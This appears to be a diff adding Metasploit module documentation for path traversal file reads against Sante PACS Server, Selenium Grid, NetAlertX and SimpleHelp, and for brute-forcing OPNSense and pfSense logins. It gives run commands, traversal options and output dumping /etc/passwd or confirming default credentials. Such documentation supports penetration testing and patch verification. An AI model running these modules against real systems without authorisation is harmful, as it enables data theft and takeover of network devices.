+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in Sante PACS Server <= v4.1.0 (CVE-2025-2264) to read arbitrary files from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.santesoft.com/win/sante-pacs-server/download.html).
+
+By default, the server listens on TCP port 3000 on all network interfaces.
+
+**Successfully tested on**
+
+- Sante PACS Server v4.1.0 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/pacsserver_traversal
+msf6 auxiliary(gather/pacsserver_traversal) > set RHOSTS <IP>
+msf6 auxiliary(gather/pacsserver_traversal) > run
+```
+
+This should return the database for the web server. Any files retrieved will
+be stored as loot.
+
+## Options
+
+### FILE
+The file to be retrieved from the file system. By default, this is the database for the web server, HTTP.db. However, any arbitrary
+file can be specified.
+
+Example: /.HTTP/HTTP.db
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with /assets/ + ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against v4.1.0 on Windows 22H22 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/pacsserver_traversal) > run
+[*] Running module against 192.168.137.217
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] File retrieved: /assets/../../.HTTP/HTTP.db
+[*] File saved as loot.
+[*] Auxiliary module execution completed
+
+```
+
+The file will be stored as loot:
+
+```
+msf6 auxiliary(gather/upsmon_traversal) > loot
+
+Loot
+====
+
+host             service  type                         name                                 content     info                                               path
+----             -------  ----                         ----                                 -------     ----                                               ----
+192.168.137.217           pacsserver.file              /.HTTP/HTTP.db                       text/plain  File retrieved through PACS Server path traversal.  /home/foo/.msf4/loot/20250502165539_default_192.168.137.217_pacsserver.file_594385.txt
+```
@@ -0,0 +1,299 @@
+## Vulnerable Application
+
+If there is an open selenium web driver, a remote attacker can send requests to the victims browser.
+In certain cases this can be used to access to the remote file system.
+
+The vulnerability affects:
+
+    * all version of open Selenium Server (Grid)
+
+This module was successfully tested on:
+
+    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04
+
+
+### Installation
+
+1. `docker pull selenium/standalone-firefox:3.141.59`
+
+2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/selenium_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get a file content
+
+
+## Options
+
+### SCHEME (Required)
+
+This is the scheme to use. Default is `file`.
+
+### FILEPATH (Required)
+
+This is the file to read. Default is `/etc/passwd`.
+
+### BROWSER (Required)
+
+This is the browser to use. Default is `firefox`.
+
+### TIMEOUT (required)
+
+This is the amount of time (in seconds) that the module will wait for the payload to be
+executed. Defaults to 75 seconds.
+
+
+## Scenarios
+### selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+```
+msf6 > use auxiliary/gather/selenium_file_read
+msf6 auxiliary(gather/selenium_file_read) > options
+
+Module options (auxiliary/gather/selenium_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BROWSER   firefox          yes       The browser to use (Accepted: firefox, chrome, MicrosoftEdge)
+   FILEPATH  /etc/passwd      yes       File to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     4444             yes       The target port (TCP)
+   SCHEME    file             yes       The scheme to use
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   TIMEOUT   75               yes       Timeout for exploit (seconds)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4445
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.141.59 detected
+[*] Started session (4a48aef3-9379-4cbe-9d6a-1ecc3176dc14).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
+rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (4a48aef3-9379-4cbe-9d6a-1ecc3176dc14). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4446
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (eb790e48-318a-4949-a7ff-8566f181a609).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+rtkit:x:104:105:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:105:106:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (eb790e48-318a-4949-a7ff-8566f181a609). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4447
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (2b4d313e-6e42-4c33-8bc8-630103269ef7).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
+rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (2b4d313e-6e42-4c33-8bc8-630103269ef7). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4448
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (599a7d03-1eca-41f3-8726-3a192104dfc1).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (599a7d03-1eca-41f3-8726-3a192104dfc1). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4453 BROWSER=chrome
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (363b104ba9d167f434518d3eb1add0c6).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Deleted session (363b104ba9d167f434518d3eb1add0c6).
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4454 BROWSER=MicrosoftEdge
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (80c4ac70d41d4ffc5585e750c94d9ac5).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Deleted session (80c4ac70d41d4ffc5585e750c94d9ac5).
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+
+An attacker can read any file through log functionality with no authentication.
+
+The vulnerability affects:
+
+    * v24.7.18 <= NetAlertX <= v24.9.12
+
+## Verification Steps
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+### Verification
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/netalertx_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get the contents of the specified file.
+
+## Options
+
+- `RHOSTS`: target host
+- `RPORT`: target port, default 20211
+- `FILEPATH`: path to the required file
+- `DEPTH`: number of `../` to be prepended to `FILEPATH`
+
+## Scenarios
+
+```
+msf6 > use auxiliary/scanner/http/netalertx_file_read 
+msf6 auxiliary(scanner/http/netalertx_file_read) > show options
+
+Module options (auxiliary/scanner/http/netalertx_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DEPTH     5                yes       Traversal Depth (to reach the root folder)
+   FILEPATH  /etc/passwd      yes       The path to the file to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                        tml
+   RPORT     20211            yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/netalertx_file_read) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/netalertx_file_read) > run
+[*] Received data:
+[*] root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+catchlog:x:100:101:catchlog:/:/sbin/nologin
+nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
+
+[*] Stored results in netalert_result.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/netalertx_file_read) > 
+
+
+```
+
+
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module attempts to bruteforce credentials for OPNSense.
+
+This module was specifically tested on version 25.1 and 21.1, with older versions being unavailable from OPNSense mirrors.
+
+Note:
+
+By default, OPNSense comes with a built-in account named `root` with the password being `opnsense`.
+
+When performing too many login attempts, OPNSense will drop all packets coming from your IP, until the router is either:
+- Restarted
+- An anti-lockout rule is added
+
+## Verification Steps
+
+1. Set up an OPNSense VM or target a real installation
+1. Start `bundle exec ./msfconsole -q`
+1. `use auxiliary/scanner/http/opnsense_login`
+1. `set ssl true`
+1. `set pass_file ...`
+1. `set user_file ...`
+1. `run`
+1. or, using some example inline options:
+```
+run pass_file=data/wordlists/default_pass_for_services_unhash.txt \
+ user_file=data/wordlists/default_pass_for_services_unhash.txt \ 
+ STOP_ON_SUCCESS=true SSL=true rport=443
+```
+1. Verify you get a login:
+```
+[+] 192.168.207.158:443 - Login Successful: root:opnsense
+```
+
+## Options
+
+### BLANK_PASSWORD
+
+Set to `true` if an additional login attempt should be made with an empty password for every user.
+
+### BRUTEFORCE_SPEED
+
+How fast to bruteforce, from 0 to 5
+
+### PASSWORD
+
+A specific password to authenticate with
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+### STOP_ON_SUCCESS
+
+Stop guessing when a credential works for a host
+
+### THREADS
+
+The number of concurrent threads (max one per host)
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line
+
+### USER_FILE
+
+File containing usernames, one per line
+
+### VERBOSE
+
+Whether to print output for all attempts
+
+## Scenarios
+```
+msf6 auxiliary(scanner/http/opnsense_login) > options
+
+Module options (auxiliary/scanner/http/opnsense_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          opnsense         no        A specific password to authenticate with
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.207.161  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             443              yes       The target port (TCP)
+   SSL               true             yes       Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
+   TARGETURI         /                yes       The base path to the OPNSense application
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          root             no        A specific username to authenticate as
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/opnsense_login) > run
+[+] 192.168.207.161:443 - Login Successful: root:opnsense
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+This module attempts to bruteforce credentials for pfSense.
+
+This module was specifically tested on version 2.7.2:
+
+**2.7.2 Download**
+
+https://atxfiles.netgate.com/mirror/downloads/
+
+Note:
+
+By default, pfSense comes with a built-in account named ```admin``` with the password being ```pfsense```.
+
+## Verification Steps
+
+1. Set up a pfSense VM using the steps above or target a real installation
+1. Start `bundle exec ./msfconsole -q`
+1. `use auxiliary/scanner/http/pfsense_login`
+1. `set ssl true`
+1. `set pass_file ...`
+1. `set user_file ...`
+1. `run`
+1. or, using some example inline options: `run pass_file=data/wordlists/default_pass_for_services_unhash.txt user_file=data/wordlists/default_pass_for_services_unhash.txt STOP_ON_SUCCESS=true SSL=true rport=443`
+1. Verify you get a login:
+```
+[+] 192.168.207.158:443 - Login Successful: admin:pfsense
+```
+
+## Options
+
+### BLANK_PASSWORD
+
+Set to `true` if an additional login attempt should be made with an empty password for every user.
+
+### BRUTEFORCE_SPEED
+
+How fast to bruteforce, from 0 to 5
+
+### PASSWORD
+
+A specific password to authenticate with
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+### STOP_ON_SUCCESS
+
+Stop guessing when a credential works for a host
+
+### THREADS
+
+The number of concurrent threads (max one per host)
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line
+
+### USER_FILE
+
+File containing usernames, one per line
+
+### VERBOSE
+
+Whether to print output for all attempts
+
+## Scenarios
+```
+msf6 auxiliary(scanner/http/pfsense_login) > options
+
+Module options (auxiliary/scanner/http/pfsense_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          pfsense          no        A specific password to authenticate with
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.207.158  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             443              yes       The target port (TCP)
+   SSL               true             no        Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
+   TARGETURI         /                yes       The base path to the pfSense application
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          admin            no        A specific username to authenticate as
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/pfsense_login) > run
+[+] 192.168.207.158:443 - Login Successful: admin:pfsense
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,93 @@
+## Vulnerable Application
+There exists a path traversal vulnerability in the /toolbox-resource endpoint of SimpleHelp that enables unauthenticated
+remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+
+### Setup
+
+On Ubuntu 22.04 download a vulnerable version of SimpleHelp, for this demo we will use 5.5.7:
+`wget https://simple-help.com/releases/5.5.7/SimpleHelp-linux-amd64.tar.gz`
+
+Unzip the application:
+```
+cd /opt
+tar -xvf SimpleHelp-linux-amd64.tar.gz
+```
+
+Start the server:
+```
+cd SimpleHelp
+sudo sh serverstart.sh
+```
+
+Navigate to the Web App GUI at: `http://127.0.0.1` (by default the application should be listening on all interfaces).
+You should see "Welcome to your new SimpleHelp Server".
+Select "Start New Server". The application should now be vulnerable to the path traversal.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use simplehelp_toolbox_path_traversal`
+1. Set the `RHOST`
+1. Run the module
+1. Receive the file `serverconfig.xml` from the SimpleHelp
+
+## Scenarios
+### SimpleHelp 5.5.7 running on Ubuntu 22.04
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use simplehelp_toolbox_path_traversal
+
+Matching Modules
+================
+
+   #  Name                                                      Disclosure Date  Rank    Check  Description
+   -  ----                                                      ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/simplehelp_toolbox_path_traversal  2025-01-12       normal  No     Simple Help Path Traversal Vulnerability
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+
+[*] Using auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Reloading module...
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 5233 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250220163655_default_172.16.199.130_simplehelp.trave_035651.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### SimpleHelp 5.5.7 running on Windows 11
+```
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
